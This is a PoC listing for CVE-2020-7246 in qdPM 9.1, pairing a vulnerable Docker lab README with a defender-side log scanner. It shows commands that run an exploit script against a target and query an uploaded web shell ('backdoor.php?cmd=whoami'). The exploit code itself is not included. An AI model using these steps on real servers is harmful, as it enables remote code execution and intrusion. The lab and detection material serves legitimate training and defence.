CVE-2020-7246 PoC — qdPM Code Issue Vulnerability

Associated Vulnerability
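Title: qdPM Code Issue Vulnerability (CVE-2020-7246)
Description: qdPM is a web-based open-source project management tool. A code issue vulnerability exists in qdPM 9.1 and earlier. An attacker can exploit this vulnerability to upload malicious PHP code files.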
Description
A Docker image vulnerable to CVE-2020-7246.
Readme
# CVE-2020-7246 (qdPM 9.1)

For educational purposes only.

See Reference for the details.


## Run
```
$ git clone https://github.com/arafatansari/SecAssignment.git
$ cd SecAssignment
$ docker build -t cve-assignment:ine .
$ docker run -it -p 80:80 cve-assignment:ine
$ service apache2 start && service mysql start
```

## Exploit
```
$ python Exploit/exploit.py -url http://{target-ip}/qdpm/ -u test@localhost.com -p password
```

## Check (exploited)
```
$ http://{target-ip}/qdpm/uploads/users/xxxx-backdoor.php?cmd=whoami
```
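
A defender-side counterpart to the check step above, as an added example that is not part of the original README or the exploit repository: it scans web-server access log lines for requests to PHP-like files under `uploads/users/`, which should only ever hold user images. The Combined Log Format, the extension list and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed Combined Log Format: ip - user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Script-like extensions that should never be served from a user upload directory.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)
UPLOAD_DIR = "/uploads/users/"  # directory named in the README's check step


def find_upload_script_hits(lines):
    """Return one dict per request that targeted a script in the upload directory."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, when, method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()
        if UPLOAD_DIR not in path or not SCRIPT_EXT.search(path):
            continue
        hits.append({
            "ip": ip, "time": when, "method": method, "path": url.path,
            "status": int(status),
            # parameter names only; values are left in the raw log
            "params": sorted(parse_qs(url.query, keep_blank_values=True)),
            # a 200 means the file exists and was served, not merely probed
            "served": status == "200",
        })
    return hits


# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Feb/2020:10:01:02 +0000] "GET /qdpm/uploads/users/avatar.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Feb/2020:10:01:09 +0000] "GET /qdpm/uploads/users/1234-backdoor.php?cmd=whoami HTTP/1.1" 200 9',
    '203.0.113.5 - - [10/Feb/2020:10:02:00 +0000] "GET /qdpm/uploads/users/x.PHTML HTTP/1.1" 404 196',
    '203.0.113.5 - - [10/Feb/2020:10:02:05 +0000] "GET /qdpm/index.php/login HTTP/1.1" 200 3021',
]

if __name__ == "__main__":
    for hit in find_upload_script_hits(SAMPLE_LOG):
        print(hit)
```

Any hit with `served` set to true warrants inspecting the file on disk and the account that uploaded it.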
File Snapshot

```
[4.0K] /data/pocs/8f20ae43fd91c4680ccceea81f62b180432c34ed
├── [ 125] Dockerfile
├── [4.0K] Exploit
│   └── [4.4K] exploit.py
├── [ 65K] RCE_CVE-2020-7246.jpg
└── [ 530] README.md

1 directory, 4 files
```